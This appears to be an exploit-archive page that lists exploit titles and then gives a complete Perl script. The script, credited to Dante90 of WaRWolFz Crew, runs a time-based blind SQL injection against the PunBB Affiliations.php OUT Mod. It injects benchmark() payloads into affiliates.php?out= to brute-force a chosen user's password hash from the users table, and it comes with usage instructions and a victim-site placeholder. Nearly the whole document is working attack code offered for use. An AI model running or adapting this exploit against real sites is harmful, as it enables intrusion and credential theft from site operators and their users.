
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
110 lines
4.3 KiB
Perl
Executable file
110 lines
4.3 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#[0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit
|
|
#Coded By Dante90, WaRWolFz Crew
|
|
#Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew
|
|
#Product: http://www.punres.org/desc.php?pid=328
|
|
|
|
use strict;
|
|
use LWP::UserAgent;
|
|
|
|
use HTTP::Request::Common;
|
|
use Time::HiRes;
|
|
use IO::Socket;
|
|
|
|
my ($Hash,$Time,$Time_Start,$Time_End,$Response);
|
|
my($Start,$End);
|
|
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
|
|
my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
|
|
my $id = shift or &usage;
|
|
my $Method = HTTP::Request->new(GET => $Host);
|
|
my $HTTP = new LWP::UserAgent;
|
|
my $Referrer = "http://warwolfz.altervista.org/";
|
|
my $DefaultTime = request($Referrer);
|
|
|
|
sub Blind_SQL_Jnjection{
|
|
my ($dec,$hex) = @_;
|
|
return "./affiliates.php?out=-1+OR+1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${id})/*";
|
|
}
|
|
|
|
for(my $I=1; $I<=40; $I++){ #N Hash characters
|
|
for(my $J=0; $J<=15; $J++){ #0 -> F
|
|
$Time_Start = time();
|
|
$HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
|
|
$Time_End = time();
|
|
$Time = request($Referrer);
|
|
refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
|
|
if($Time_End - $Time_Start > 6){
|
|
$Time = request($Referrer);
|
|
refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
|
|
if($Time_End - $Time_Start > 6){
|
|
syswrite(STDOUT,chr($chars[$J]));
|
|
$Hash .= chr($chars[$J]);
|
|
$Time = request($Referrer);
|
|
refresh($Host, $DefaultTime, $J, $Hash, $Time, $I);
|
|
last;
|
|
}
|
|
}
|
|
}
|
|
if($I == 1 && length $Hash < 0 && !$Hash){
|
|
print " * Exploit Failed *\n";
|
|
print " ------------------------------------------------------ \n";
|
|
exit;
|
|
}
|
|
if($I == 40){
|
|
print " * Exploit Successed *\n";
|
|
print " ------------------------------------------------------\n ";
|
|
system("pause");
|
|
}
|
|
}
|
|
|
|
sub usage{
|
|
system("cls");
|
|
{
|
|
print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
|
|
print " ------------------------------------------------------ \n";
|
|
print " * USAGE: *\n";
|
|
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
|
|
print " * perl name_exploit.pl [id] *\n";
|
|
print " ------------------------------------------------------ \n";
|
|
print " * Powered By Dante90, WaRWolFz Crew *\n";
|
|
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
|
|
print " ------------------------------------------------------ \n";
|
|
};
|
|
exit;
|
|
}
|
|
|
|
sub request{
|
|
$Referrer = $_[0];
|
|
$Method->referrer($Referrer);
|
|
$Start = Time::HiRes::time();
|
|
$Response = $HTTP->request($Method);
|
|
$Response->is_success() or die "$Host : ", $Response->message,"\n";
|
|
$End = Time::HiRes::time();
|
|
$Time = $End - $Start;
|
|
return $Time;
|
|
}
|
|
|
|
sub refresh{
|
|
system("cls");
|
|
{
|
|
print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
|
|
print " ------------------------------------------------------ \n";
|
|
print " * USAGE: *\n";
|
|
print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
|
|
print " * perl name_exploit.pl [uid] *\n";
|
|
print " ------------------------------------------------------ \n";
|
|
print " * Powered By Dante90, WaRWolFz Crew *\n";
|
|
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
|
|
print " ------------------------------------------------------ \n";
|
|
};
|
|
print " * Victime Site: " . $_[0] . "\n";
|
|
print " * Default Time: " . $_[1] . " seconds\n";
|
|
print " * BruteForcing Hash: " . chr($chars[$_[2]]) . "\n";
|
|
print " * BruteForcing N Char Hash: " . $_[5] . "\n";
|
|
print " * SQL Time: " . $_[4] . " seconds\n";
|
|
print " * Hash: " . $_[3] . "\n";
|
|
}
|
|
|
|
#WaRWolFz Crew
|
|
|
|
# milw0rm.com [2009-06-30]
|